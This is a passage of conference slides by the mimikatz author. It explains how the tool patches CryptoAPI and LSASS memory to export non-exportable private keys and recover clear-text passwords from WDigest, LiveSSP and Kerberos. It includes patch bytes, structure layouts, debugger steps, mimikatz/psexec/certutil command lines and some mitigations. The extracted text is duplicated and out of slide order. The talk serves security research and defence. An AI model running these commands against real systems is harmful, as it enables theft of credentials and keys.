ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
